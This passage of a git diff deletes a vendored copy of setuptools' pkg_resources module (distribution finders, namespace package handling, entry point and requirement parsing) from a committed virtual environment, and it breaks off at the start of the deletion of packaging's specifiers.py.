an example.""" - _distribution_finders[importer_type] = distribution_finder - - -def find_distributions(path_item, only=False): - """Yield distributions accessible via `path_item`""" - importer = get_importer(path_item) - finder = _find_adapter(_distribution_finders, importer) - return finder(importer, path_item, only) - - -def find_eggs_in_zip(importer, path_item, only=False): - """ - Find eggs in zip files; possibly multiple nested eggs. 
- """ - if importer.archive.endswith('.whl'): - # wheels are not supported with this finder - # they don't have PKG-INFO metadata, and won't ever contain eggs - return - metadata = EggMetadata(importer) - if metadata.has_metadata('PKG-INFO'): - yield Distribution.from_filename(path_item, metadata=metadata) - if only: - # don't yield nested distros - return - for subitem in metadata.resource_listdir(''): - if _is_egg_path(subitem): - subpath = os.path.join(path_item, subitem) - dists = find_eggs_in_zip(zipimport.zipimporter(subpath), subpath) - for dist in dists: - yield dist - elif subitem.lower().endswith('.dist-info'): - subpath = os.path.join(path_item, subitem) - submeta = EggMetadata(zipimport.zipimporter(subpath)) - submeta.egg_info = subpath - yield Distribution.from_location(path_item, subitem, submeta) - - -register_finder(zipimport.zipimporter, find_eggs_in_zip) - - -def find_nothing(importer, path_item, only=False): - return () - - -register_finder(object, find_nothing) - - -def _by_version_descending(names): - """ - Given a list of filenames, return them in descending order - by version number. - - >>> names = 'bar', 'foo', 'Python-2.7.10.egg', 'Python-2.7.2.egg' - >>> _by_version_descending(names) - ['Python-2.7.10.egg', 'Python-2.7.2.egg', 'foo', 'bar'] - >>> names = 'Setuptools-1.2.3b1.egg', 'Setuptools-1.2.3.egg' - >>> _by_version_descending(names) - ['Setuptools-1.2.3.egg', 'Setuptools-1.2.3b1.egg'] - >>> names = 'Setuptools-1.2.3b1.egg', 'Setuptools-1.2.3.post1.egg' - >>> _by_version_descending(names) - ['Setuptools-1.2.3.post1.egg', 'Setuptools-1.2.3b1.egg'] - """ - def _by_version(name): - """ - Parse each component of the filename - """ - name, ext = os.path.splitext(name) - parts = itertools.chain(name.split('-'), [ext]) - return [packaging.version.parse(part) for part in parts] - - return sorted(names, key=_by_version, reverse=True) - - -def find_on_path(importer, path_item, only=False): - """Yield distributions accessible on a sys.path directory""" - path_item = _normalize_cached(path_item) - - if _is_unpacked_egg(path_item): - yield Distribution.from_filename( - path_item, metadata=PathMetadata( - path_item, os.path.join(path_item, 'EGG-INFO') - ) - ) - return - - entries = safe_listdir(path_item) - - # for performance, before sorting by version, - # screen entries for only those that will yield - # distributions - filtered = ( - entry - for entry in entries - if dist_factory(path_item, entry, only) - ) - - # scan for .egg and .egg-info in directory - path_item_entries = _by_version_descending(filtered) - for entry in path_item_entries: - fullpath = os.path.join(path_item, entry) - factory = dist_factory(path_item, entry, only) - for dist in factory(fullpath): - yield dist - - -def dist_factory(path_item, entry, only): - """ - Return a dist_factory for a path_item and entry - """ - lower = entry.lower() - is_meta = any(map(lower.endswith, ('.egg-info', '.dist-info'))) - return ( - distributions_from_metadata - if is_meta else - find_distributions - if not only and _is_egg_path(entry) else - resolve_egg_link - if not only and lower.endswith('.egg-link') else - NoDists() - ) - - -class NoDists: - """ - >>> bool(NoDists()) - False - - >>> list(NoDists()('anything')) - [] - """ - def __bool__(self): - return False - if six.PY2: - __nonzero__ = __bool__ - - def __call__(self, fullpath): - return iter(()) - - -def safe_listdir(path): - """ - Attempt to list contents of path, but suppress some exceptions. 
- """ - try: - return os.listdir(path) - except (PermissionError, NotADirectoryError): - pass - except OSError as e: - # Ignore the directory if does not exist, not a directory or - # permission denied - ignorable = ( - e.errno in (errno.ENOTDIR, errno.EACCES, errno.ENOENT) - # Python 2 on Windows needs to be handled this way :( - or getattr(e, "winerror", None) == 267 - ) - if not ignorable: - raise - return () - - -def distributions_from_metadata(path): - root = os.path.dirname(path) - if os.path.isdir(path): - if len(os.listdir(path)) == 0: - # empty metadata dir; skip - return - metadata = PathMetadata(root, path) - else: - metadata = FileMetadata(path) - entry = os.path.basename(path) - yield Distribution.from_location( - root, entry, metadata, precedence=DEVELOP_DIST, - ) - - -def non_empty_lines(path): - """ - Yield non-empty lines from file at path - """ - with open(path) as f: - for line in f: - line = line.strip() - if line: - yield line - - -def resolve_egg_link(path): - """ - Given a path to an .egg-link, resolve distributions - present in the referenced path. - """ - referenced_paths = non_empty_lines(path) - resolved_paths = ( - os.path.join(os.path.dirname(path), ref) - for ref in referenced_paths - ) - dist_groups = map(find_distributions, resolved_paths) - return next(dist_groups, ()) - - -register_finder(pkgutil.ImpImporter, find_on_path) - -if hasattr(importlib_machinery, 'FileFinder'): - register_finder(importlib_machinery.FileFinder, find_on_path) - -_declare_state('dict', _namespace_handlers={}) -_declare_state('dict', _namespace_packages={}) - - -def register_namespace_handler(importer_type, namespace_handler): - """Register `namespace_handler` to declare namespace packages - - `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item - handler), and `namespace_handler` is a callable like this:: - - def namespace_handler(importer, path_entry, moduleName, module): - # return a path_entry to use for child packages - - Namespace handlers are only called if the importer object has already - agreed that it can handle the relevant path item, and they should only - return a subpath if the module __path__ does not already contain an - equivalent subpath. For an example namespace handler, see - ``pkg_resources.file_ns_handler``. 
- """ - _namespace_handlers[importer_type] = namespace_handler - - -def _handle_ns(packageName, path_item): - """Ensure that named package includes a subpath of path_item (if needed)""" - - importer = get_importer(path_item) - if importer is None: - return None - - # capture warnings due to #1111 - with warnings.catch_warnings(): - warnings.simplefilter("ignore") - loader = importer.find_module(packageName) - - if loader is None: - return None - module = sys.modules.get(packageName) - if module is None: - module = sys.modules[packageName] = types.ModuleType(packageName) - module.__path__ = [] - _set_parent_ns(packageName) - elif not hasattr(module, '__path__'): - raise TypeError("Not a package:", packageName) - handler = _find_adapter(_namespace_handlers, importer) - subpath = handler(importer, path_item, packageName, module) - if subpath is not None: - path = module.__path__ - path.append(subpath) - loader.load_module(packageName) - _rebuild_mod_path(path, packageName, module) - return subpath - - -def _rebuild_mod_path(orig_path, package_name, module): - """ - Rebuild module.__path__ ensuring that all entries are ordered - corresponding to their sys.path order - """ - sys_path = [_normalize_cached(p) for p in sys.path] - - def safe_sys_path_index(entry): - """ - Workaround for #520 and #513. - """ - try: - return sys_path.index(entry) - except ValueError: - return float('inf') - - def position_in_sys_path(path): - """ - Return the ordinal of the path based on its position in sys.path - """ - path_parts = path.split(os.sep) - module_parts = package_name.count('.') + 1 - parts = path_parts[:-module_parts] - return safe_sys_path_index(_normalize_cached(os.sep.join(parts))) - - new_path = sorted(orig_path, key=position_in_sys_path) - new_path = [_normalize_cached(p) for p in new_path] - - if isinstance(module.__path__, list): - module.__path__[:] = new_path - else: - module.__path__ = new_path - - -def declare_namespace(packageName): - """Declare that package 'packageName' is a namespace package""" - - _imp.acquire_lock() - try: - if packageName in _namespace_packages: - return - - path = sys.path - parent, _, _ = packageName.rpartition('.') - - if parent: - declare_namespace(parent) - if parent not in _namespace_packages: - __import__(parent) - try: - path = sys.modules[parent].__path__ - except AttributeError: - raise TypeError("Not a package:", parent) - - # Track what packages are namespaces, so when new path items are added, - # they can be updated - _namespace_packages.setdefault(parent or None, []).append(packageName) - _namespace_packages.setdefault(packageName, []) - - for path_item in path: - # Ensure all the parent's path items are reflected in the child, - # if they apply - _handle_ns(packageName, path_item) - - finally: - _imp.release_lock() - - -def fixup_namespace_packages(path_item, parent=None): - """Ensure that previously-declared namespace packages include path_item""" - _imp.acquire_lock() - try: - for package in _namespace_packages.get(parent, ()): - subpath = _handle_ns(package, path_item) - if subpath: - fixup_namespace_packages(subpath, package) - finally: - _imp.release_lock() - - -def file_ns_handler(importer, path_item, packageName, module): - """Compute an ns-package subpath for a filesystem or zipfile importer""" - - subpath = os.path.join(path_item, packageName.split('.')[-1]) - normalized = _normalize_cached(subpath) - for item in module.__path__: - if _normalize_cached(item) == normalized: - break - else: - # Only return the path if it's not already there - 
return subpath - - -register_namespace_handler(pkgutil.ImpImporter, file_ns_handler) -register_namespace_handler(zipimport.zipimporter, file_ns_handler) - -if hasattr(importlib_machinery, 'FileFinder'): - register_namespace_handler(importlib_machinery.FileFinder, file_ns_handler) - - -def null_ns_handler(importer, path_item, packageName, module): - return None - - -register_namespace_handler(object, null_ns_handler) - - -def normalize_path(filename): - """Normalize a file/dir name for comparison purposes""" - return os.path.normcase(os.path.realpath(os.path.normpath(_cygwin_patch(filename)))) - - -def _cygwin_patch(filename): # pragma: nocover - """ - Contrary to POSIX 2008, on Cygwin, getcwd (3) contains - symlink components. Using - os.path.abspath() works around this limitation. A fix in os.getcwd() - would probably better, in Cygwin even more so, except - that this seems to be by design... - """ - return os.path.abspath(filename) if sys.platform == 'cygwin' else filename - - -def _normalize_cached(filename, _cache={}): - try: - return _cache[filename] - except KeyError: - _cache[filename] = result = normalize_path(filename) - return result - - -def _is_egg_path(path): - """ - Determine if given path appears to be an egg. - """ - return path.lower().endswith('.egg') - - -def _is_unpacked_egg(path): - """ - Determine if given path appears to be an unpacked egg. - """ - return ( - _is_egg_path(path) and - os.path.isfile(os.path.join(path, 'EGG-INFO', 'PKG-INFO')) - ) - - -def _set_parent_ns(packageName): - parts = packageName.split('.') - name = parts.pop() - if parts: - parent = '.'.join(parts) - setattr(sys.modules[parent], name, sys.modules[packageName]) - - -def yield_lines(strs): - """Yield non-empty/non-comment lines of a string or sequence""" - if isinstance(strs, six.string_types): - for s in strs.splitlines(): - s = s.strip() - # skip blank lines/comments - if s and not s.startswith('#'): - yield s - else: - for ss in strs: - for s in yield_lines(ss): - yield s - - -MODULE = re.compile(r"\w+(\.\w+)*$").match -EGG_NAME = re.compile( - r""" - (?P[^-]+) ( - -(?P[^-]+) ( - -py(?P[^-]+) ( - -(?P.+) - )? - )? - )? - """, - re.VERBOSE | re.IGNORECASE, -).match - - -class EntryPoint: - """Object representing an advertised importable object""" - - def __init__(self, name, module_name, attrs=(), extras=(), dist=None): - if not MODULE(module_name): - raise ValueError("Invalid module name", module_name) - self.name = name - self.module_name = module_name - self.attrs = tuple(attrs) - self.extras = tuple(extras) - self.dist = dist - - def __str__(self): - s = "%s = %s" % (self.name, self.module_name) - if self.attrs: - s += ':' + '.'.join(self.attrs) - if self.extras: - s += ' [%s]' % ','.join(self.extras) - return s - - def __repr__(self): - return "EntryPoint.parse(%r)" % str(self) - - def load(self, require=True, *args, **kwargs): - """ - Require packages for this EntryPoint, then resolve it. - """ - if not require or args or kwargs: - warnings.warn( - "Parameters to load are deprecated. Call .resolve and " - ".require separately.", - PkgResourcesDeprecationWarning, - stacklevel=2, - ) - if require: - self.require(*args, **kwargs) - return self.resolve() - - def resolve(self): - """ - Resolve the entry point from its module and attrs. 
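
        Illustrative example (the entry point shown is hypothetical)::

            ep = EntryPoint.parse("main = some.module:some_func")
            func = ep.resolve()  # imports some.module, returns its some_func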
- """ - module = __import__(self.module_name, fromlist=['__name__'], level=0) - try: - return functools.reduce(getattr, self.attrs, module) - except AttributeError as exc: - raise ImportError(str(exc)) - - def require(self, env=None, installer=None): - if self.extras and not self.dist: - raise UnknownExtra("Can't require() without a distribution", self) - - # Get the requirements for this entry point with all its extras and - # then resolve them. We have to pass `extras` along when resolving so - # that the working set knows what extras we want. Otherwise, for - # dist-info distributions, the working set will assume that the - # requirements for that extra are purely optional and skip over them. - reqs = self.dist.requires(self.extras) - items = working_set.resolve(reqs, env, installer, extras=self.extras) - list(map(working_set.add, items)) - - pattern = re.compile( - r'\s*' - r'(?P.+?)\s*' - r'=\s*' - r'(?P[\w.]+)\s*' - r'(:\s*(?P[\w.]+))?\s*' - r'(?P\[.*\])?\s*$' - ) - - @classmethod - def parse(cls, src, dist=None): - """Parse a single entry point from string `src` - - Entry point syntax follows the form:: - - name = some.module:some.attr [extra1, extra2] - - The entry name and module name are required, but the ``:attrs`` and - ``[extras]`` parts are optional - """ - m = cls.pattern.match(src) - if not m: - msg = "EntryPoint must be in 'name=module:attrs [extras]' format" - raise ValueError(msg, src) - res = m.groupdict() - extras = cls._parse_extras(res['extras']) - attrs = res['attr'].split('.') if res['attr'] else () - return cls(res['name'], res['module'], attrs, extras, dist) - - @classmethod - def _parse_extras(cls, extras_spec): - if not extras_spec: - return () - req = Requirement.parse('x' + extras_spec) - if req.specs: - raise ValueError() - return req.extras - - @classmethod - def parse_group(cls, group, lines, dist=None): - """Parse an entry point group""" - if not MODULE(group): - raise ValueError("Invalid group name", group) - this = {} - for line in yield_lines(lines): - ep = cls.parse(line, dist) - if ep.name in this: - raise ValueError("Duplicate entry point", group, ep.name) - this[ep.name] = ep - return this - - @classmethod - def parse_map(cls, data, dist=None): - """Parse a map of entry point groups""" - if isinstance(data, dict): - data = data.items() - else: - data = split_sections(data) - maps = {} - for group, lines in data: - if group is None: - if not lines: - continue - raise ValueError("Entry points must be listed in groups") - group = group.strip() - if group in maps: - raise ValueError("Duplicate group name", group) - maps[group] = cls.parse_group(group, lines, dist) - return maps - - -def _remove_md5_fragment(location): - if not location: - return '' - parsed = urllib.parse.urlparse(location) - if parsed[-1].startswith('md5='): - return urllib.parse.urlunparse(parsed[:-1] + ('',)) - return location - - -def _version_from_file(lines): - """ - Given an iterable of lines from a Metadata file, return - the value of the Version field, if present, or None otherwise. 
- """ - def is_version_line(line): - return line.lower().startswith('version:') - version_lines = filter(is_version_line, lines) - line = next(iter(version_lines), '') - _, _, value = line.partition(':') - return safe_version(value.strip()) or None - - -class Distribution: - """Wrap an actual or potential sys.path entry w/metadata""" - PKG_INFO = 'PKG-INFO' - - def __init__( - self, location=None, metadata=None, project_name=None, - version=None, py_version=PY_MAJOR, platform=None, - precedence=EGG_DIST): - self.project_name = safe_name(project_name or 'Unknown') - if version is not None: - self._version = safe_version(version) - self.py_version = py_version - self.platform = platform - self.location = location - self.precedence = precedence - self._provider = metadata or empty_provider - - @classmethod - def from_location(cls, location, basename, metadata=None, **kw): - project_name, version, py_version, platform = [None] * 4 - basename, ext = os.path.splitext(basename) - if ext.lower() in _distributionImpl: - cls = _distributionImpl[ext.lower()] - - match = EGG_NAME(basename) - if match: - project_name, version, py_version, platform = match.group( - 'name', 'ver', 'pyver', 'plat' - ) - return cls( - location, metadata, project_name=project_name, version=version, - py_version=py_version, platform=platform, **kw - )._reload_version() - - def _reload_version(self): - return self - - @property - def hashcmp(self): - return ( - self.parsed_version, - self.precedence, - self.key, - _remove_md5_fragment(self.location), - self.py_version or '', - self.platform or '', - ) - - def __hash__(self): - return hash(self.hashcmp) - - def __lt__(self, other): - return self.hashcmp < other.hashcmp - - def __le__(self, other): - return self.hashcmp <= other.hashcmp - - def __gt__(self, other): - return self.hashcmp > other.hashcmp - - def __ge__(self, other): - return self.hashcmp >= other.hashcmp - - def __eq__(self, other): - if not isinstance(other, self.__class__): - # It's not a Distribution, so they are not equal - return False - return self.hashcmp == other.hashcmp - - def __ne__(self, other): - return not self == other - - # These properties have to be lazy so that we don't have to load any - # metadata until/unless it's actually needed. (i.e., some distributions - # may not know their name or version without loading PKG-INFO) - - @property - def key(self): - try: - return self._key - except AttributeError: - self._key = key = self.project_name.lower() - return key - - @property - def parsed_version(self): - if not hasattr(self, "_parsed_version"): - self._parsed_version = parse_version(self.version) - - return self._parsed_version - - def _warn_legacy_version(self): - LV = packaging.version.LegacyVersion - is_legacy = isinstance(self._parsed_version, LV) - if not is_legacy: - return - - # While an empty version is technically a legacy version and - # is not a valid PEP 440 version, it's also unlikely to - # actually come from someone and instead it is more likely that - # it comes from setuptools attempting to parse a filename and - # including it in the list. So for that we'll gate this warning - # on if the version is anything at all or not. - if not self.version: - return - - tmpl = textwrap.dedent(""" - '{project_name} ({version})' is being parsed as a legacy, - non PEP 440, - version. You may find odd behavior and sort order. - In particular it will be sorted as less than 0.0. It - is recommended to migrate to PEP 440 compatible - versions. 
- """).strip().replace('\n', ' ') - - warnings.warn(tmpl.format(**vars(self)), PEP440Warning) - - @property - def version(self): - try: - return self._version - except AttributeError: - version = self._get_version() - if version is None: - path = self._get_metadata_path_for_display(self.PKG_INFO) - msg = ( - "Missing 'Version:' header and/or {} file at path: {}" - ).format(self.PKG_INFO, path) - raise ValueError(msg, self) - - return version - - @property - def _dep_map(self): - """ - A map of extra to its list of (direct) requirements - for this distribution, including the null extra. - """ - try: - return self.__dep_map - except AttributeError: - self.__dep_map = self._filter_extras(self._build_dep_map()) - return self.__dep_map - - @staticmethod - def _filter_extras(dm): - """ - Given a mapping of extras to dependencies, strip off - environment markers and filter out any dependencies - not matching the markers. - """ - for extra in list(filter(None, dm)): - new_extra = extra - reqs = dm.pop(extra) - new_extra, _, marker = extra.partition(':') - fails_marker = marker and ( - invalid_marker(marker) - or not evaluate_marker(marker) - ) - if fails_marker: - reqs = [] - new_extra = safe_extra(new_extra) or None - - dm.setdefault(new_extra, []).extend(reqs) - return dm - - def _build_dep_map(self): - dm = {} - for name in 'requires.txt', 'depends.txt': - for extra, reqs in split_sections(self._get_metadata(name)): - dm.setdefault(extra, []).extend(parse_requirements(reqs)) - return dm - - def requires(self, extras=()): - """List of Requirements needed for this distro if `extras` are used""" - dm = self._dep_map - deps = [] - deps.extend(dm.get(None, ())) - for ext in extras: - try: - deps.extend(dm[safe_extra(ext)]) - except KeyError: - raise UnknownExtra( - "%s has no such extra feature %r" % (self, ext) - ) - return deps - - def _get_metadata_path_for_display(self, name): - """ - Return the path to the given metadata file, if available. - """ - try: - # We need to access _get_metadata_path() on the provider object - # directly rather than through this class's __getattr__() - # since _get_metadata_path() is marked private. - path = self._provider._get_metadata_path(name) - - # Handle exceptions e.g. in case the distribution's metadata - # provider doesn't support _get_metadata_path(). 
- except Exception: - return '[could not detect]' - - return path - - def _get_metadata(self, name): - if self.has_metadata(name): - for line in self.get_metadata_lines(name): - yield line - - def _get_version(self): - lines = self._get_metadata(self.PKG_INFO) - version = _version_from_file(lines) - - return version - - def activate(self, path=None, replace=False): - """Ensure distribution is importable on `path` (default=sys.path)""" - if path is None: - path = sys.path - self.insert_on(path, replace=replace) - if path is sys.path: - fixup_namespace_packages(self.location) - for pkg in self._get_metadata('namespace_packages.txt'): - if pkg in sys.modules: - declare_namespace(pkg) - - def egg_name(self): - """Return what this distribution's standard .egg filename should be""" - filename = "%s-%s-py%s" % ( - to_filename(self.project_name), to_filename(self.version), - self.py_version or PY_MAJOR - ) - - if self.platform: - filename += '-' + self.platform - return filename - - def __repr__(self): - if self.location: - return "%s (%s)" % (self, self.location) - else: - return str(self) - - def __str__(self): - try: - version = getattr(self, 'version', None) - except ValueError: - version = None - version = version or "[unknown version]" - return "%s %s" % (self.project_name, version) - - def __getattr__(self, attr): - """Delegate all unrecognized public attributes to .metadata provider""" - if attr.startswith('_'): - raise AttributeError(attr) - return getattr(self._provider, attr) - - def __dir__(self): - return list( - set(super(Distribution, self).__dir__()) - | set( - attr for attr in self._provider.__dir__() - if not attr.startswith('_') - ) - ) - - if not hasattr(object, '__dir__'): - # python 2.7 not supported - del __dir__ - - @classmethod - def from_filename(cls, filename, metadata=None, **kw): - return cls.from_location( - _normalize_cached(filename), os.path.basename(filename), metadata, - **kw - ) - - def as_requirement(self): - """Return a ``Requirement`` that matches this distribution exactly""" - if isinstance(self.parsed_version, packaging.version.Version): - spec = "%s==%s" % (self.project_name, self.parsed_version) - else: - spec = "%s===%s" % (self.project_name, self.parsed_version) - - return Requirement.parse(spec) - - def load_entry_point(self, group, name): - """Return the `name` entry point of `group` or raise ImportError""" - ep = self.get_entry_info(group, name) - if ep is None: - raise ImportError("Entry point %r not found" % ((group, name),)) - return ep.load() - - def get_entry_map(self, group=None): - """Return the entry point map for `group`, or the full entry map""" - try: - ep_map = self._ep_map - except AttributeError: - ep_map = self._ep_map = EntryPoint.parse_map( - self._get_metadata('entry_points.txt'), self - ) - if group is not None: - return ep_map.get(group, {}) - return ep_map - - def get_entry_info(self, group, name): - """Return the EntryPoint object for `group`+`name`, or ``None``""" - return self.get_entry_map(group).get(name) - - def insert_on(self, path, loc=None, replace=False): - """Ensure self.location is on path - - If replace=False (default): - - If location is already in path anywhere, do nothing. - - Else: - - If it's an egg and its parent directory is on path, - insert just ahead of the parent. - - Else: add to the end of path. - If replace=True: - - If location is already on path anywhere (not eggs) - or higher priority than its parent (eggs) - do nothing. 
- - Else: - - If it's an egg and its parent directory is on path, - insert just ahead of the parent, - removing any lower-priority entries. - - Else: add it to the front of path. - """ - - loc = loc or self.location - if not loc: - return - - nloc = _normalize_cached(loc) - bdir = os.path.dirname(nloc) - npath = [(p and _normalize_cached(p) or p) for p in path] - - for p, item in enumerate(npath): - if item == nloc: - if replace: - break - else: - # don't modify path (even removing duplicates) if - # found and not replace - return - elif item == bdir and self.precedence == EGG_DIST: - # if it's an .egg, give it precedence over its directory - # UNLESS it's already been added to sys.path and replace=False - if (not replace) and nloc in npath[p:]: - return - if path is sys.path: - self.check_version_conflict() - path.insert(p, loc) - npath.insert(p, nloc) - break - else: - if path is sys.path: - self.check_version_conflict() - if replace: - path.insert(0, loc) - else: - path.append(loc) - return - - # p is the spot where we found or inserted loc; now remove duplicates - while True: - try: - np = npath.index(nloc, p + 1) - except ValueError: - break - else: - del npath[np], path[np] - # ha! - p = np - - return - - def check_version_conflict(self): - if self.key == 'setuptools': - # ignore the inevitable setuptools self-conflicts :( - return - - nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt')) - loc = normalize_path(self.location) - for modname in self._get_metadata('top_level.txt'): - if (modname not in sys.modules or modname in nsp - or modname in _namespace_packages): - continue - if modname in ('pkg_resources', 'setuptools', 'site'): - continue - fn = getattr(sys.modules[modname], '__file__', None) - if fn and (normalize_path(fn).startswith(loc) or - fn.startswith(self.location)): - continue - issue_warning( - "Module %s was already imported from %s, but %s is being added" - " to sys.path" % (modname, fn, self.location), - ) - - def has_version(self): - try: - self.version - except ValueError: - issue_warning("Unbuilt egg for " + repr(self)) - return False - return True - - def clone(self, **kw): - """Copy this distribution, substituting in any changed keyword args""" - names = 'project_name version py_version platform location precedence' - for attr in names.split(): - kw.setdefault(attr, getattr(self, attr, None)) - kw.setdefault('metadata', self._provider) - return self.__class__(**kw) - - @property - def extras(self): - return [dep for dep in self._dep_map if dep] - - -class EggInfoDistribution(Distribution): - def _reload_version(self): - """ - Packages installed by distutils (e.g. numpy or scipy), - which uses an old safe_version, and so - their version numbers can get mangled when - converted to filenames (e.g., 1.11.0.dev0+2329eae to - 1.11.0.dev0_2329eae). These distributions will not be - parsed properly - downstream by Distribution and safe_version, so - take an extra step and try to get the version number from - the metadata file itself instead of the filename. - """ - md_version = self._get_version() - if md_version: - self._version = md_version - return self - - -class DistInfoDistribution(Distribution): - """ - Wrap an actual or potential sys.path entry - w/metadata, .dist-info style. 
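
    Illustrative origin of such objects (the directory name is hypothetical):
    ``Distribution.from_location(path, 'Sample-1.0.dist-info', metadata)``
    selects this class via the ``.dist-info`` entry in ``_distributionImpl``.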
- """ - PKG_INFO = 'METADATA' - EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])") - - @property - def _parsed_pkg_info(self): - """Parse and cache metadata""" - try: - return self._pkg_info - except AttributeError: - metadata = self.get_metadata(self.PKG_INFO) - self._pkg_info = email.parser.Parser().parsestr(metadata) - return self._pkg_info - - @property - def _dep_map(self): - try: - return self.__dep_map - except AttributeError: - self.__dep_map = self._compute_dependencies() - return self.__dep_map - - def _compute_dependencies(self): - """Recompute this distribution's dependencies.""" - dm = self.__dep_map = {None: []} - - reqs = [] - # Including any condition expressions - for req in self._parsed_pkg_info.get_all('Requires-Dist') or []: - reqs.extend(parse_requirements(req)) - - def reqs_for_extra(extra): - for req in reqs: - if not req.marker or req.marker.evaluate({'extra': extra}): - yield req - - common = frozenset(reqs_for_extra(None)) - dm[None].extend(common) - - for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []: - s_extra = safe_extra(extra.strip()) - dm[s_extra] = list(frozenset(reqs_for_extra(extra)) - common) - - return dm - - -_distributionImpl = { - '.egg': Distribution, - '.egg-info': EggInfoDistribution, - '.dist-info': DistInfoDistribution, -} - - -def issue_warning(*args, **kw): - level = 1 - g = globals() - try: - # find the first stack frame that is *not* code in - # the pkg_resources module, to use for the warning - while sys._getframe(level).f_globals is g: - level += 1 - except ValueError: - pass - warnings.warn(stacklevel=level + 1, *args, **kw) - - -class RequirementParseError(ValueError): - def __str__(self): - return ' '.join(self.args) - - -def parse_requirements(strs): - """Yield ``Requirement`` objects for each specification in `strs` - - `strs` must be a string, or a (possibly-nested) iterable thereof. - """ - # create a steppable iterator, so we can handle \-continuations - lines = iter(yield_lines(strs)) - - for line in lines: - # Drop comments -- a hash without a space may be in a URL. - if ' #' in line: - line = line[:line.find(' #')] - # If there is a line continuation, drop it, and append the next line. - if line.endswith('\\'): - line = line[:-2].strip() - try: - line += next(lines) - except StopIteration: - return - yield Requirement(line) - - -class Requirement(packaging.requirements.Requirement): - def __init__(self, requirement_string): - """DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!""" - try: - super(Requirement, self).__init__(requirement_string) - except packaging.requirements.InvalidRequirement as e: - raise RequirementParseError(str(e)) - self.unsafe_name = self.name - project_name = safe_name(self.name) - self.project_name, self.key = project_name, project_name.lower() - self.specs = [ - (spec.operator, spec.version) for spec in self.specifier] - self.extras = tuple(map(safe_extra, self.extras)) - self.hashCmp = ( - self.key, - self.url, - self.specifier, - frozenset(self.extras), - str(self.marker) if self.marker else None, - ) - self.__hash = hash(self.hashCmp) - - def __eq__(self, other): - return ( - isinstance(other, Requirement) and - self.hashCmp == other.hashCmp - ) - - def __ne__(self, other): - return not self == other - - def __contains__(self, item): - if isinstance(item, Distribution): - if item.key != self.key: - return False - - item = item.version - - # Allow prereleases always in order to match the previous behavior of - # this method. 
In the future this should be smarter and follow PEP 440 - # more accurately. - return self.specifier.contains(item, prereleases=True) - - def __hash__(self): - return self.__hash - - def __repr__(self): - return "Requirement.parse(%r)" % str(self) - - @staticmethod - def parse(s): - req, = parse_requirements(s) - return req - - -def _always_object(classes): - """ - Ensure object appears in the mro even - for old-style classes. - """ - if object not in classes: - return classes + (object,) - return classes - - -def _find_adapter(registry, ob): - """Return an adapter factory for `ob` from `registry`""" - types = _always_object(inspect.getmro(getattr(ob, '__class__', type(ob)))) - for t in types: - if t in registry: - return registry[t] - - -def ensure_directory(path): - """Ensure that the parent directory of `path` exists""" - dirname = os.path.dirname(path) - py31compat.makedirs(dirname, exist_ok=True) - - -def _bypass_ensure_directory(path): - """Sandbox-bypassing version of ensure_directory()""" - if not WRITE_SUPPORT: - raise IOError('"os.mkdir" not supported on this platform.') - dirname, filename = split(path) - if dirname and filename and not isdir(dirname): - _bypass_ensure_directory(dirname) - try: - mkdir(dirname, 0o755) - except FileExistsError: - pass - - -def split_sections(s): - """Split a string or iterable thereof into (section, content) pairs - - Each ``section`` is a stripped version of the section header ("[section]") - and each ``content`` is a list of stripped lines excluding blank lines and - comment-only lines. If there are any such lines before the first section - header, they're returned in a first ``section`` of ``None``. - """ - section = None - content = [] - for line in yield_lines(s): - if line.startswith("["): - if line.endswith("]"): - if section or content: - yield section, content - section = line[1:-1].strip() - content = [] - else: - raise ValueError("Invalid section heading", line) - else: - content.append(line) - - # wrap up last segment - yield section, content - - -def _mkstemp(*args, **kw): - old_open = os.open - try: - # temporarily bypass sandboxing - os.open = os_open - return tempfile.mkstemp(*args, **kw) - finally: - # and then put it back - os.open = old_open - - -# Silence the PEP440Warning by default, so that end users don't get hit by it -# randomly just because they use pkg_resources. We want to append the rule -# because we want earlier uses of filterwarnings to take precedence over this -# one. -warnings.filterwarnings("ignore", category=PEP440Warning, append=True) - - -# from jaraco.functools 1.3 -def _call_aside(f, *args, **kwargs): - f(*args, **kwargs) - return f - - -@_call_aside -def _initialize(g=globals()): - "Set up global resource manager (deliberately not state-saved)" - manager = ResourceManager() - g['_manager'] = manager - g.update( - (name, getattr(manager, name)) - for name in dir(manager) - if not name.startswith('_') - ) - - -@_call_aside -def _initialize_master_working_set(): - """ - Prepare the master working set and make the ``require()`` - API available. - - This function has explicit effects on the global state - of pkg_resources. It is intended to be invoked once at - the initialization of this module. - - Invocation by other packages is unsupported and done - at their own risk. 
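
    After this runs, the familiar module-level helpers are bound as globals,
    e.g. (illustrative; 'console_scripts' is simply a common group name)::

        import pkg_resources
        pkg_resources.require('setuptools')
        for ep in pkg_resources.iter_entry_points('console_scripts'):
            print(ep.name)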
- """ - working_set = WorkingSet._build_master() - _declare_state('object', working_set=working_set) - - require = working_set.require - iter_entry_points = working_set.iter_entry_points - add_activation_listener = working_set.subscribe - run_script = working_set.run_script - # backward compatibility - run_main = run_script - # Activate all distributions already on sys.path with replace=False and - # ensure that all distributions added to the working set in the future - # (e.g. by calling ``require()``) will get activated as well, - # with higher priority (replace=True). - tuple( - dist.activate(replace=False) - for dist in working_set - ) - add_activation_listener( - lambda dist: dist.activate(replace=True), - existing=False, - ) - working_set.entries = [] - # match order - list(map(working_set.add_entry, sys.path)) - globals().update(locals()) - -class PkgResourcesDeprecationWarning(Warning): - """ - Base class for warning about deprecations in ``pkg_resources`` - - This class is not derived from ``DeprecationWarning``, and as such is - visible by default. - """ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/specifiers.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/specifiers.py deleted file mode 100644 index fe09bb1dbb22f7670d33fe4b86ac45e207cc7eb1..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pkg_resources/_vendor/packaging/specifiers.py +++ /dev/null @@ -1,863 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. -from __future__ import absolute_import, division, print_function - -import abc -import functools -import itertools -import re - -from ._compat import string_types, with_metaclass -from ._typing import TYPE_CHECKING -from .utils import 